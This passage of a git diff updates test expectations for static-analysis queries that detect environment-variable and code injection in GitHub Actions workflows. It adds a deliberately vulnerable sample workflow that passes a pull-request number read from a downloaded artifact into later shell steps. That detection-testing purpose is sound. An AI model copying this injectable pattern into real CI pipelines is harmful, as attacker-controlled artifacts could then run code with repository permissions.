b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -48,6 +52,12 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -66,3 +76,7 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b3da13beda3..2cd36953802 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -48,5 +52,11 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml new file mode 100644 index 00000000000..dc101c76944 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -0,0 +1,56 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + outputs: + pr_num: ${{ steps.set-ref.outputs.pr_num }} + ref: ${{ steps.set-ref.outputs.ref }} + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_OUTPUT + echo "ref=$ref" >> $GITHUB_OUTPUT + + test2: + name: test2 + runs-on: ubuntu-latest + needs: get-artifacts + permissions: + actions: read + statuses: write + steps: + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3f6fd5310c4..69085548f69 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -442,6 +461,8 @@ subpaths | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bb58a7395a1..360c33720fb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | 